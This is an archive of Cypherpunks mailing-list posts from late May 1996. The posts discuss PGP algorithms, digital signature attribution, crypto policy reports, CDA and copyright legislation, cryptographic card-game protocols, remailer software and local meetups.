From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Thu, 30 May 1996 11:07:56 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
In-Reply-To: <Pine.SV4.3.91.960529161332.5354K-100000@larry.infi.net>
Message-ID: <H1LPoD170w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz <alanh@infi.net> writes:

> What _did_   Solitaire do for Windows 3.1?   Distract the attention of
> the unwashed masses away from the actual merits of the beast?

It's interesting to note that
a) All previous versions of MS Windows starting I think with the beta .9
which I first saw included Reversi (Othello), a much more intellectual game.
b) IBM OS/2 comes with a pile of games, including a much nicer solitaire,
chess, a game where you have to catch a cat with your mouse, etc.
Ostensibly, they're there to train users to use the mouse interface.
E.g., Solitaire teaches users to drag and drop.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matts Kallioniemi <matts@pi.se>
Date: Thu, 30 May 1996 05:24:48 +0800
To: "[0m [5m    Toth"                         <cypherpunks@toad.com
Subject: Re: RSA breaking
Message-ID: <2.2.32.19960529162523.0035a098@mail.pi.se>
MIME-Version: 1.0
Content-Type: text/plain


At 14:21 1996-05-29 +0200, [0m [5m    Toth wrote:
>But, cause there is a but, it can be broken by an hardware system. Gimme
the money, i'll break it, a simple algorithm can be "hardwarly programmed"
and with very high-tech components, the speed it can have is enough to break
an RSA key.

How much money do you want for breaking a 2048 bit RSA key? How soon can you
deliver the broken private key?

Matts





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jean-Paul Kroepfli <JeanPaul.Kroepfli@ns.fnet.fr>
Date: Thu, 30 May 1996 06:35:40 +0800
To: "'Cypherpunks list'" <cypherpunks@toad.com>
Subject: What is the strength of the MPJ/Diamond algorithm (Michael Paul Johnson 1989)
Message-ID: <01BB4D90.20F86640@JPKroepsli.S-IP.EUnet.fr>
MIME-Version: 1.0
Content-Type: text/plain


I have seen the Diamond2 algorithm in the dlock2 package, with its predecessors MPJ, MPJ2.
This a thesis by Michael Paul Johnson for is Master of Science degree (1989), and a free softwar (date: 12/21/1995).
Schneier's Applied Cryptography doesn't say anything about MPJ or Diamond.
What is its strength?
Jean-Paul Kroepfli
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
Jean-Paul et Micheline Kroepfli      (our son: Nicolas and daughter: Celine)
eMail: JeanPaul.Kroepfli@utopia.fnet.fr    Also Compuserve and MSNetwork
Phone: +33  81 55 52 59  (F)          PostMail: F-25640 Breconchaux (France)
   or: +41  21 843 27 36 (CH)               or: CP 138, CH-1337 Vallorbe
  Fax: +33  81 55 52 62                                        (Switzerland)
Zephyr(r) : InterNet Communication and Commerce, Security and Cryptography consulting
PGP Fingerprint : 19 FB 67 EA 20 70 53 89  AF B2 5C 7F 02 1F CA 8F
"The InterNet is the most open standard since air for breathing"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Thu, 30 May 1996 14:08:32 +0800
To: cypherpunks@toad.com
Subject: [SF Bay Area] A talk on Pari by Carl Hansen
Message-ID: <v01540b00add2be90f832@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Seen on the net:

                      Pari

                    talk by

                   Carl Hansen

       Monday, June 10 from 7:30 pm to 9 pm

        BMUG, 2055 Center Street, Berkeley

Carl will give an introductory talk on Pari, software that supports
arbitrary precision arithmetic and includes many function for doing
number theory.  He will compare it to other math software and show
the special features of this program, including how Pari can be used
as a cryptographers workbench.

This presentation will be at the BMUG office at 2055 Center Street
in Berkeley.  The office is near the north west corner of Center Street
and Shattuck Ave. which is half a block from the Berkeley BART station.

Driving directions:
        Take the University exit off 80.
        Head east on University toward the UC Berkeley campus.
        Turn right at Shattuck (McDonalds will be at the corner.)
        Go 2 blocks.
        Turn right on Center and look for parking.
        I recommend the parking garage on the left, as the one on
                the right may close at 8 pm.

For more information on the Berkeley Macintosh Users Group (BMUG)
Mathematics Special Interest Group (SIG), contact:
        Nancy Blachman
        Variable Symbols, Inc.
        6537 Chabot Road
        Oakland, CA  94618-1618
        Email: nb@cs.stanford.edu
               nb@eeyore.stanford.edu
        Fax: 510 652 8461
        Telephone: 510 652 8462


-------------------------------------------------------------------------
Steven Weller                      |  Technology (n):
                                   |
                                   |     A substitute for adulthood.
stevenw@best.com                   |     Popular with middle-aged men.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 30 May 1996 11:19:11 +0800
To: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Subject: Re: Ok, what about PGP (was: MD5 collisions)
In-Reply-To: <199605292005.QAA27595@unix.asb.com>
Message-ID: <199605292310.TAA20965@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> It seems quite doable to add support for SHA-1 signatures (and possibly key
> generation for encrypting secret keys?).
> 
> Adding 3DES (and maybe Luby-Rackoff-SHA, assuming it hasn't been cracked
> recently at the Fast Software Conf.... more info?!?) would be nifty too...
> unless, of course, there's meaning to the Real Soon Now that PGP3 folx
> claim.

Both of these algorithms are currently in the PGPlib sources.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 14:12:14 +0800
To: Cypherpunks@toad.com
Subject: Re: Clipper III analysis
Message-ID: <add251951f021004f0e4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:57 AM 5/30/96, jonathon wrote:
....
>        It is a specialty within the QDE Field, but there are a few
>        QDE's that are _currently_ doing that.  << Printed hard copy,
>        not electronic copy, but that is the _only_ difference.  >>
>
>> I would be very interested to hear how a "Questioned Document Examiner" can
>
>        It is at the point where statistics, textual analysis, grammar
>        and lingustics converge.
>
>> possibly determine that a digital signature was not applied by a particular
>> person.
>
>        I don't remember the minimum number of characters that are needed
>        to establish that a document was written by a specific individual.
>        Roughly fifteen pages of text that both sides admit as being
>        authentic is required for the undisputed exemplars.

Ah, but the issue of who _signs_ a document is fundamentally and
importantly different from the issue of who _wrote_ the document.

If I have allegedly _signed_ a contract, who cares if exhaustive analysis
reveals it to have been _written_ with 77.93% probability by Irving J.
Shlublutz, CPA for State Farm Insurance Compance?

The issue with digital signatures is who _signed_ a document, not who
_wrote_ a document.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Thu, 30 May 1996 09:20:32 +0800
To: cypherpunks@toad.com
Subject: Re: Ok, what about PGP (was: MD5 collisions)
Message-ID: <199605292005.QAA27595@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


I poked around the pgp.h and pgformat.txt files in the PGP 2.6.2
distribution.  There *are* designator bytes for the hash (and cipher)
algorithms, hash size, etc.

It seems quite doable to add support for SHA-1 signatures (and possibly key
generation for encrypting secret keys?).

Adding 3DES (and maybe Luby-Rackoff-SHA, assuming it hasn't been cracked
recently at the Fast Software Conf.... more info?!?) would be nifty too...
unless, of course, there's meaning to the Real Soon Now that PGP3 folx
claim.

I
d work on the hack now (and just might...) but I'm stuck stranded in the
United States. :(


Rob.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 30 May 1996 15:37:49 +0800
To: cypherpunks@toad.com
Subject: NRC crypto policy report to be released Thursday
Message-ID: <Pine.3.89.9605291951.A28220-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


I was offline for the Memorial Day weekend, and I'm hundreds of messages 
behind on cypherpunks, so ignore this if it's redundant...

But anyway, a reminder:

The National Research Council's report on crypto policy will be unveiled
tomorrow at the National Press Club at 1 pm in Washington, DC. I'm going
to try my best to be there. 

>From their web page at <http://www2.nas.edu/cstbweb/>:

   The Computer Science and Telecommunications Board (CSTB) of the
   National Research Council (NRC) has completed a congressionally
   mandated study of national cryptography policy. The final report,
   Cryptography's Role in Securing the Information Society, will be
   released to the public on May 30, 1996 at a public briefing. A large
   number of the authoring committee members will attend.

   The public briefing will take place in the Main Lounge of the National
   Press Club, 14th and F Streets, N.W., Washington, D.C., from 1:00 PM
   to 3:00 PM, on Thursday, May 30, 1996. Committee members will respond
   to questions from attendees, and a limited number of pre-publication
   copies of the report will be available at that time. By the close of
   business on May 30, a summary of the report will be made available
   through this web page; the full publication will be made available
   when final printed copies of the book are available (probably around
   the beginning of August).

   The committee also intends to conduct a second public briefing on the
   report in
   Menlo Park, California at SRI International. The briefing will be held
   in the Auditorium of the International Building from 10 to 11 am on
   Wednesday, June.5. The address is 333 Ravenswood Avenue, Menlo Park,
   California, 94025. For more information about the briefing at SRI,
   contact Alice Galloway at 415-859-2711 (alice_galloway@qm.sri.com).

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 14:29:45 +0800
To: cypherpunks@toad.com
Subject: Re: Statistical analysis of anonymous databases
Message-ID: <add257a6200210045dd9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:12 PM 5/29/96, Alan Horowitz wrote:
>I would ask, is there any known medical gain that has resulted from
>such a data-base correllation.
>
>I do not accept a researcher's own statements as to the utility of the work
>(S)he's done with someone's funding.  Seen too much of it at close
>quarters...   Nor do I accept reeports in the lay press - these are
>nothing more than re-gurgitated press releases from PR depts of institutions.

Separating out issues of privacy, and addressing only your basic point
about a "known medical gain that has resulted from such a data-base
correllation," there are many obvious correlations which have been
discovered by use of various data in data bases.

The increased prevalence of sickle cell anemia in blacks, the increased
prevalence of Tay-Sachs in Jews....all of these things are well-established
(and important for dealing with health issues of these groups...that is, it
is important and beneficial that someone made such correlations).

Back to privacy issues. I am not arguing that the privacy wishes,
contractually agreed to, of a patient be ignored. I am simply refuting your
point that no medical gain has come from data base correlations.

As to the "lay press," I read some issues of "Nature," "Science," "New
Scientist," "Discover," and "Scientific American," the journals in which
the scientists speak more or less directly, and I am convinced that
statistical inference from data bases is indeed a powerful tool.

(I am not saying that the privacy wishes and contractual language of
patients is to be ignored on this basis, only saying that statistical
inference is indeed valuable. So valuable, in fact, that the
libertarian/cypherpunk solution is for patients to "sell" this
information.)

--Tim May




Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 16:57:37 +0800
To: cypherpunks@toad.com
Subject: A billion transistors on a chip
Message-ID: <add25a2b21021004f52d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:01 PM 5/29/96, jim bell wrote:
>At 03:46 PM 5/29/96 GMT, John Young wrote:
>>   5-29-96. FiTi:
>>
>>   Chips Galore [Editorial]
>>   Texas Instruments' claim to have developed a technology
>>   capable of inscribing 125m transistors, or computing
>>   elements, on a thumbnail-sized slice of silicon is
>>   remarkable chiefly because the technique is commonplace.
>
>Having been following the progress of IC technology for over 20 years, I can
>recall when 1 million transistors/chip was the furthest-out prediction
>"they" were willing to make.

I was one of "them" as early as 1974, more than 22 years ago, when the
leading chips of the day contained about 15,000 transistors.

And I recall _many_ forecasts about the number of transistors which would
be likely to be on a chip.

Gordon Moore, a guy I had many dealings with in my years at Intel, had his
charts and it was pretty clear where things were going. At least 20 years
ago it was apparent that lithography trends would make a million
transistors on a chip a reality by 1990, if not earlier.

I recall Jim Meindl of Stanford, whose class I spoke to in the late 70s,
was predicting a _billion_ transistors on a chip by the year 2000. I and my
colleagues at Intel felt he was on target, and this was almost 20 years
ago. And it appears he is on target, give or take a trivial factor of two
or so.

Final Note: I watched Jerry Junkins of T.I. make his "TImeline" (not to be
confused with "TIMline") chip announcement yesterday, on CNN and CNBC. He
died this morning of a heart attack, on a business trip to Germany. Texas
Instruments was a rival of Intel's, but Junkins was undoubtetly a great
business leader. He will be missed.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nowher.com (Nobody in particular)
Date: Thu, 30 May 1996 10:44:36 +0800
To: cypherpunks@toad.com
Subject: forged addresses
Message-ID: <199605292012.NAA01475@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi, I'm not sure if there was ever a thread on this, but I was wondering if 
anyone can determine your real email address, if you were to fake it to your 
email client.

I hope that this doesn't offend anyone, since this is a high traffic list, but 
I was wondering if this would work.  To try it out, I setup my client to think 
I was someone else, and sent myself an email.  I could only figure out what 
ISP it came from.

What I would like to know is, can any of the experts on this list determine my 
address from the header of this post??

again, if this is something that I shouldn't have done, just let me know, and 
it won't happen again.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Thu, 30 May 1996 15:38:07 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: [crypto] crypto-protocols for trading card games
In-Reply-To: <Pine.SV4.3.91.960529161332.5354K-100000@larry.infi.net>
Message-ID: <Pine.LNX.3.93.960529201458.3427C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 May 1996, Alan Horowitz wrote:

> What _did_   Solitaire do for Windows 3.1?   Distract the attention of 
> the unwashed masses away from the actual merits of the beast?

	What "merits"?

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@crash.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 30 May 1996 15:16:18 +0800
To: cypherpunks@toad.com
Subject: online law-- new book
Message-ID: <199605300324.UAA09313@netcom4.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



a quick word to the cpunks with legal interests.

a great new book called "Online Law: the SPA's Legal Guide
to Doing Business on the Internet" seems to me to be
a superlative compilation. edited by Thomas J Smedinghoff.
Addison-Wesley, 1996.

extremely up-to-date-- in one section cites various court
decisions from 1995 on the scientologists vs. netcom etc.
heavy on the citations/footnotes of existing law.

has very good coverage of encryption and digital signatures
etc. and talks about their legal status. also, good info
on copyrights, defamation, patents, online transactions, 
trade secrets, privacy, licensing 1st amendment, 
sexually explicit materials, email in the workplace, 
export control, trade practices, contracts, etc.

I expect this volume is going to be widely praised and
become a very definitive guide. it seems to me a quick
look in this book would go about 95% toward resolving
immediately a lot of the online debates I've read here
and elsewhere about "what the law says".  the price
is also very good for something of this type, typically
the law-related material is really expensive.


ordering: (800) 238 9682
see http://www.aw.com/devpress
ISBN 0-201-48980-5
$34.95
544 pages
paperback








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Thu, 30 May 1996 17:46:44 +0800
To: cypherpunks@toad.com
Subject: Update on CDA and copyright (5/29/96)
Message-ID: <Pine.3.89.9605292004.A28220-0100000@well>
MIME-Version: 1.0
Content-Type: text/plain


ON THE CDA:

Folks involved in the case expect a decision within the next week from the
Philadelphia three-judge panel hearing our challenge to the CDA. The DoJ
has a few weeks to appeal to the Supreme Court if they lose. 

--------------------------------------------------------------------------

ON COPYRIGHT:

Regarding the online copyright legislation, there's plenty of action on
the Hill -- and contrary to what I thought a week ago, there's even a
fighting chance that this bill will pass this year. 

So far, full Senate judiciary and the House judiciary intellectual
property subcommittee have held hearings. 

The House has taken the lead here, and the tentative date for the
subcommittee markup of HR2441 is June 5. (It was to have been last week,
but was cancelled at the last minute when no agreement was reached.)

The Senate seems to be waiting to see what the House does before making
any sudden moves. General feeling is that the legislation was on a fast
schedule but has been slowed down considerably because of ongoing
controvery over OSP liability and (especially) section 1201. 

The big snarl is over 1201, and some alliances of convenience are breaking
down. More to the point, libraries are finally mobilizing grassroots
opposition.

Brock has a piece about this in a recent Muckraker on HotWired.

(I'm hundreds of messages behind on cypherpunks so if you reply to this 
please copy me.)

 -Declan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 30 May 1996 16:05:57 +0800
To: cypherpunks@toad.com
Subject: Re: [crypto] crypto-protocols for trading card games
Message-ID: <add2640a2302100446f7@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:56 PM 5/29/96, David F. Ogren wrote:
>> On Wed, 29 May 1996, Simon Spero wrote:
>>
>> > Design a set of crypto protocols to support the issuing, trading,
>> > and playing of such card games in real time (100ms compute time
>> > per move)
>>
>> I'd been thinking about it from the opposite point of view: make up
>> a card game (possibly electronic, like what you're proposing) that
>> acts as intro to crypto for the untamed hordes of game players.
>>
>I've had similar ideas, but there are snags.  Card playing via
>encryption techniques is a great idea in theory, but in reality the
>technical requirements often prevent implementation.

I didn't comment earlier, because I didn't want to sound like the old-timer
who claims an idea is an old one, but "card games" were in fact cited as a
perfect example of a "tools needed" situation. At least 3 years ago, and
probably closer to 3.5 years ago, there was discussion of the cryptographic
primitives needed to play cards.

(I mean on the Cypherpunks list...there was certainly academic research on
"fair coin tosses over insecure lines" and "card games" going back at least
15 years. Specifically, some of the work on "mental poker" and "bit
commitment" is very directly related to playing games over insecure lines.)

In fact, one of the goals Eric Hughes and I had in our early discussions,
before this group and this mailing list, was of what it would take to make
real, or reify, the many academic results of cryptography. (Only the
simplest of which are "secure communications" and "digital signatures.")

Dice games, card games, numbers games, are only special cases of the larger
issue of "mutually untrusted agents" and the interactions they can handle.

I applaud Simon Spero's interest, even if it others raised similar issues a
few years ago. Actually, little progress has been made, so there is much
work still to be done.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Thu, 30 May 1996 14:51:09 +0800
To: remailer-operators@c2.org
Subject: Asendmail Status & Politikal Rant
Message-ID: <Pine.A32.3.93.960529211352.30940A-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



Well, asendmail has been running for several days now, handling outbound
mix mail from my remailer. It appears to be getting the mail through
reliably, although there are still a few bugs.

After reading through the responses from other cypherpunks and interested
parties, I decided to make a few changes to the software, the largest of
which was support for a separate configuration file of text strings to be
sent in SMTP's initial HELO command. It is possible to add as many lines
as you care to in the list of fake HELO strings, which should satisfy the
need (want?) for randomness in the headering of outbound mail, without
restricting anyone to useing either faked site names, OR real site names.

I'll be working on final preparation of README's and install notes, and
should have a tar.gziped source available by friday at the outside. Once
the initial software is released I'll put together a mail robot to help
with gathering proxy addresses.

I still need test mail to be routed through the mailer! Everything appears
to be OK, but I'd like more chances to see what is happening with mail
that gets resent this way.


On to politiks:

I understand that the entire concpet of this program is a bit
controversial, and I can accept that.  Personnaly I am not certain exactly
how to feel about it.  I suppose that I am not thrilled about the idea of
cloaking the mailer this way, but at the same time I perceive it as an
evil of requirement. I beleive very strongly that remailers SHOULD exist,
whether or not the CoS, or the FBI agree; and I am willing to be a bit
impolite if thats what needs to be. My only hesitation is that I'm afraid
now might be to soon.

At the same time I think it would be unfortunate if it came down to
someone actually going to jail for remailing before people are willing to
do something that may be a bit extreme.

Anyway, someone raised the argument that the problem was political, and
that a technical solution would do more harm than good - maybe you're
right, I can't see the future, But it seems to me that I read somewhere
that "Cypherpunks Write Code". This statement is amazingly profound in its
implications.

Anonymous communication on the net depends on the technical solutions
embodied in the current remailing software, and cryptography applications.
If, years ago, the cypherpunks had decided that a publicity campaign,
political lobbying, and apologizing were the right course of action,
anonymous speach on the internet would be virtually non-existant today. If
the cypherpunks decide today that coding is not the answer, where will
free speach on the net be in 5 years? I think it is very naive to beleive
that the world is going to change enough, quickly enough, that remailers
will become accepted, and protected, methods of speaking - no matter how
politically correct we try to be.

Why do we see big business and big government launching a full frontal
assault on the remailers, while the mailing lists continue to operate
without incident? Because the enemy's of free speach recognize where the
true threat to their opression lies. Relying on politics to preserve our rights
is like throwing down your gun and asking the bear to please not eat you.

The powers that be want us to shut up. The programs that we write are the 
weapons that will defend our right to speak. 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Tonnesen <stonnes@ix.netcom.com>
Date: Thu, 30 May 1996 18:02:33 +0800
To: austin-cpunks@ssz.com
Subject: Austin Cpunks Meet Saturday
Message-ID: <2.2.32.19960530052417.0069af54@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Austin Cypherpunks will have a monthly general meeting
on Saturday June 1 at 6:00PM at the Central Market Cafe
on North Lamar.  Look for the stack of crypto-related books.

This is an informal meeting for discussion of assorted
projects including the remailer, the video, recent crypto
events, etc.

-S





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rarab@localnet.com
Date: Thu, 30 May 1996 16:38:45 +0800
To: cypherpunks@toad.com
Subject: Any pertinent info-remail,thanks.
Message-ID: <199605300501.BAA09791@buffalo1.localnet.com>
MIME-Version: 1.0
Content-Type: text/plain







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Sat, 1 Jun 1996 15:56:34 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Ok, what about PGP (was: MD5 collisions)
Message-ID: <199606010433.VAA21006@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 29 May 1996 19:03:04 pdt, wlkngowl@unix.asb.com wrote:

>I poked around the pgp.h and pgformat.txt files in the PGP 2.6.2
>distribution.  There *are* designator bytes for the hash (and cipher)
>algorithms, hash size, etc.
>
>It seems quite doable to add support for SHA-1 signatures (and possibly key
>generation for encrypting secret keys?).
>
>Adding 3DES (and maybe Luby-Rackoff-SHA, assuming it hasn't been cracked
>recently at the Fast Software Conf.... more info?!?) would be nifty too...
>unless, of course, there's meaning to the Real Soon Now that PGP3 folx
>claim.

How about a NSA-stomper option that would use all-of-the-above? For the truly paranoid (or 
owners of Pentium-Pro 200Mhz multi-processor machines

Also, what's the verdict on IDEA? Is there a switch yet that would allow straight RSA? 
(with the obvious speed decrease...)

>I'd work on the hack now (and just might...) but I'm stuck stranded in the
>United States. :(
I've always wondered what it says about a country that is afraid to let its citizens work 
on privacy... 
/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jonathon <grafolog@netcom.com>
Date: Thu, 30 May 1996 14:15:40 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Clipper III analysis
In-Reply-To: <add1c03814021004c9a5@[205.199.118.202]>
Message-ID: <Pine.3.89.9605300136.A14869-0100000@netcom2>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 29 May 1996, Timothy C. May wrote:

> At 5:54 AM 5/29/96, jonathon wrote:
> 
> >        A good Questioned Document Examiner will be able to demonstrate
> >        that the signed document in question was not authored by Joe
> >        Blow, even if it contains his digital signature.
> 
> I was of course talking about digital signatures, not handwritten signatures.

	I was also talking about digital signatures. 

	It is a specialty within the QDE Field, but there are a few
	QDE's that are _currently_ doing that.  << Printed hard copy, 
	not electronic copy, but that is the _only_ difference.  >>

> I would be very interested to hear how a "Questioned Document Examiner" can

	It is at the point where statistics, textual analysis, grammar
	and lingustics converge.  

> possibly determine that a digital signature was not applied by a particular
> person.

	I don't remember the minimum number of characters that are needed
	to establish that a document was written by a specific individual.
	Roughly fifteen pages of text that both sides admit as being 
	authentic is required for the undisputed exemplars.

	The actual work is not that difficult, just time consuming. 

        xan

        jonathon
        grafolog@netcom.com


**********************************************************************
*								     *
*       Opinions expressed don't necessarily reflect my own views.   *
*								     *
*	There is no way that they can be construed to represent      *
*	any organization's views.				     *
*								     *
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
*								     *
*       http://members.tripod.com/~graphology/index.html             *
*								     *
***********************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 30 May 1996 14:15:27 +0800
To: cypherpunks@toad.com
Subject: Science on Schrodinger's Cat
Message-ID: <199605300220.CAA02723@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   We've filed at our Web site two May 24 Science articles on 
   the NIST team's research on quantum superposition, reported 
   by the NYT yesterday (keyed ONE_two): 
 
   A Research News article on the research by Gary Taubes, 
 
      "Schizophrenic Atom Doubles As Schrodinger's Cat -- or 
      Kitten." 
 
 
   And, the Research Article: 
 
      "A 'Schrodinger's Cat' Superposition State of an Atom." 
 
      C. Monroe, D. M. Meekhof, B. E. King, D. J. Wineland. 
 
 
   Due to the heavy use of equations and figures, the material 
   is imaged in JPEG (compressed) format -- 150 resolution and 
   enlarged a bit for readability, so the files are fairly 
   large: 
 
   The news article: 
 
      http://pwp.usa.pipeline.com/~jya/scat0.jpg  (234 kb) 
 
   The research article: 
 
      http://pwp.usa.pipeline.com/~jya/scat1.jpg   (153 kb) 
      http://pwp.usa.pipeline.com/~jya/scat2.jpg   (223 kb) 
      http://pwp.usa.pipeline.com/~jya/scat3.jpg   (224 kb) 
      http://pwp.usa.pipeline.com/~jya/scat4.jpg   (248 kb) 
      http://pwp.usa.pipeline.com/~jya/scat5.jpg   (200 kb) 
      http://pwp.usa.pipeline.com/~jya/scat6.jpg   (179 kb) 
      http://pwp.usa.pipeline.com/~jya/scat7.jpg   (210 kb) 
      http://pwp.usa.pipeline.com/~jya/scat8.jpg   (245 kb) 
      http://pwp.usa.pipeline.com/~jya/scat9.jpg    (35 kb) 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@iaxs.net (Samuel Kaplin)
Date: Thu, 30 May 1996 14:23:53 +0800
To: cypherpunks@toad.com
Subject: Subpoenaed for Deposition
Message-ID: <31ad07e6.209427706@mail.iaxs.net>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded from alt.religion.scientology
-----------------------------------------------
>From: "Homer W. Smith" <homer@light.lightlink.com>
>Subject: Subpoenaed for Deposition
>Date: Wed, 29 May 1996 14:03:47 -0400
>Organization: ART MATRIX - LIGHTLINK
>Lines: 12
>Distribution: inet
>Message-ID: <Pine.SUN.3.91.960529135938.4049A-100000@light.lightlink.com>
>NNTP-Posting-Host: light.lightlink.com
>Mime-Version: 1.0
>Content-Type: TEXT/PLAIN; charset=US-ASCII
>To: Remailer Operators Network <reop-l@cornell.edu>
>cc: Multiple recipients of list IAP <IAP@VMA.CC.ND.EDU>


    I have received a subpoena to be deposed by the Church of
Scientology concerning the posting of Scamizdat #3 through the
Free Zone Remailer on April 1st, 1995.
 
    Homer

------------------------------------------------------------------------------
Homer Wilson Smith     News, Web, Telnet      Art Matrix - Lightlink
(607) 277-0959         SunOS 4.1.4 Sparc 20   Internet Access, Ithaca NY
homer@lightlink.com    info@lightlink.com     http://www.lightlink.com



---
Never play cards with a man called Doc.

Fuck Exon - Fuck The CDA - Fuck Scientology - Fuck Dianetics - Fuck Congress
   Fuck The President - Fuck Obsenity - Fuck Democrats - Fuck Republicans

                        Support Freedom Of Expression!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 30 May 1996 15:31:47 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: NRC crypto policy report to be released Thursday
Message-ID: <199605300317.DAA09263@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The initial September 14, 1994 announcement of the NRC National
Cryptography project is at: 
 
 
     http://www.wpi.edu/~ryant/ncp.html 
 
 
It describes the program and lists committee members absolutely certain to
deny GAK tomorrow, trust them. 
 
 




